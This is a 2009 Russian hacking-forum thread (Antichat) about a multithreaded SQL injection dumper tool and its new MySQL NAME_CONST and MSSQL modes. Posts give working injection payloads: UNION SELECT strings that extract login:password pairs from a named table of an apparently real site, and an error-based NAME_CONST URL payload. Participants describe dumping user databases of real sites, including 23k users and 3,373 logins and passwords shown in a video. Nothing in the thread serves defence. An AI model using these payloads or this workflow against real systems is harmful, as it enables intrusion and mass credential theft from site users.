ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 13.11.2009, 01:06
axe89
Участник форума
Регистрация: 18.08.2008
Сообщений: 138
Провел на форуме:
1835548

Репутация: 92
Отправить сообщение для axe89 с помощью ICQ
По умолчанию

я если чесно когда про тулзу незнал я в ручную переберал дошол до 2к
 
Ответить с цитированием

  #112  
Старый 13.11.2009, 01:12
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

ок, еще раз:

+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass) ,7,8,9,10,11+from+mobile_funsat1.polyfun_users+lim it+200,1

ты хочешь сказать, что при данном запросе что-то выводит?

PS: Нестандартные запросы, типо

limit 20,20 - не поддерживаются

Последний раз редактировалось Pashkela; 13.11.2009 в 01:15..
 
Ответить с цитированием

  #113  
Старый 13.11.2009, 01:17
axe89
Участник форума
Регистрация: 18.08.2008
Сообщений: 138
Провел на форуме:
1835548

Репутация: 92
Отправить сообщение для axe89 с помощью ICQ
По умолчанию

+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass) ,7,8,9,10,11+ from+polyfun_users+limit+2000,15
 
Ответить с цитированием

  #114  
Старый 13.11.2009, 16:51
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

udate:

MySql inj NAME_CONST:

- Многопоточный
- POST/GET/Coockies & etc.
- Все те же возможности, что и при обычной скуле + та же скорость
- просто заменить два раза "version()" на "^" (shift+6), т.е. было:

Код:
http://site.com/index.php?site=profile&id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1/*
стало:

Код:
http://site.com/index.php?site=profile&id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((^),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((^),14)e)b)a)/**/and/**/'1'='1/*
Отдельный риспект хотелось бы выразить Qwazar и jokester за эту тему.

В видео рассмотрен полный процесс от получения версия до дампа 3 373 юзеров (логины/пароли) с риал сайта.

Видео: - режим MySql inj NAME_CONST

Обновления как всегда в первом посте темы, скрипт в UTF-8

Последний раз редактировалось Pashkela; 13.11.2009 в 19:02..
 
Ответить с цитированием

  #115  
Старый 13.11.2009, 22:42
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от axe89  
нет эт я пример просто написал! а нескажешь почему например юзеров 10000 тулза ничинает выводить но не все а намного меньше ну штук 100-150 но бывает даже меньше(( может вот из-за этого лимита просто я пробывал в ручную переберать и лимит шол вот как(Limit+1,1 limit+2,1 limit+3,2 limit+4,3) ну и так далее
значит что то с базой не то, не может быть так урезал остальных. Я уже проверил и слил базу на 23к с чем то юзеров прекрасно слил. Еще ставь на 10 потоков а то база может испортится(на 10 тоже быстро сливает).

Pashkela что то при MySQL injection column number bruter номера полей много раз выводит 11 а так там 25. Пробовал изменят на GET, добавил/ удалил c id=-1 "-" но все таки выводит полей 11. ССылку не в студию (большая база), но ты протестирую может глюк какой то. Еще если можно добав функцию чтоб юзер сам выбрал:
[1]Union Select
[2]Order By
[3]Group By
а то авто выбор может глючит.
 
Ответить с цитированием

  #116  
Старый 13.11.2009, 22:50
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

В режиме MySQL injection column number bruter решающее значение имеет уникальная мессага при правильном/неправильном запросе именно кол-ва столбцов. Проверял на 105 колонках - все работает.

PS: Нет никогда абсолютной гарантии, что тулза сработает на любой инъекции, это тоже учитывайте. На большинстве, но не на абсолютно всех, как и любая другая прога такого типа. Всегда есть какие-то особенности, всё не предусмотришь

Играйте с потоками - уменьшайте вплоть до одного при некорректных ответах. Большое значение имеет качество коннекта с сайтом и ширина вашего интернет канала в том числе.

Последний раз редактировалось Pashkela; 13.11.2009 в 22:52..
 
Ответить с цитированием

  #117  
Старый 15.11.2009, 07:28
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

прога класс, но кто нит знает многопоточную дампер на MSSQL(silviasql и DarkMSSQL не в счет, они на больших базах тормозит)? Toolza прекрасно работает с большыми базами, но жал только на MySQL ((

очень надо если кто знает на MSSQL
 
Ответить с цитированием

  #118  
Старый 15.11.2009, 14:46
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2-ой пост темы:

https://forum.antichat.ru/showpost.php?p=236188&postcount=3

А вообще сейчас пишу

Последний раз редактировалось Pashkela; 15.11.2009 в 16:16..
 
Ответить с цитированием

  #119  
Старый 16.11.2009, 03:02
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

udate:

MSSQL injection:

- POST/GET/Cookie & etc.
- Определение кол-ва колонок и принтабельной колонки не требуется
- авто-CHAR всех данных
- Полный цикл - от системных переменных до данных из колонок:
1) Получаем системные переменные (@@version,system_user,db_name())
2) Таблицы из information_schema.tables (1 thread, специфика MSSQL inj)
3) Колонки из таблицы (1 thread, специфика MSSQL inj)
4) Данные из таблицы на основе выбранных колонок (Multithread, max 10) - обязательно наличие autoincriment поля (id & etc).

Видео: режим MSSQL injection

PS: Пока сыровато конечно, но из 10 скулей 8 обработало. Пока только исключительно для классических случаев. Need more tests

Последний раз редактировалось Pashkela; 16.11.2009 в 03:56..
 
Ответить с цитированием

  #120  
Старый 16.11.2009, 05:34
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

главное 10потоков на Dump вставил, молодец будем тестит.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Групарик 1.0 - скрипт для массовой рассылки приглашений на группы [В]Контакте HERO Покупка, продажа, услуги в Соц. Сетях 19 31.10.2009 10:26
Продажа от Goldriver'a Goldriver ICQ - Покупка, продажа 3 06.07.2009 20:15
Мобильные браузеры Skyfire 1.0 и Opera Mobile 9.7 jerrri Мировые новости 0 10.06.2009 18:29
Самая главная программа для Интернета: некоторые факты о веб-браузерах. FordMX Soft - Windows 4 17.04.2009 22:33
FreeDOS v 1.0 released spencer Мировые новости 12 11.09.2006 20:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ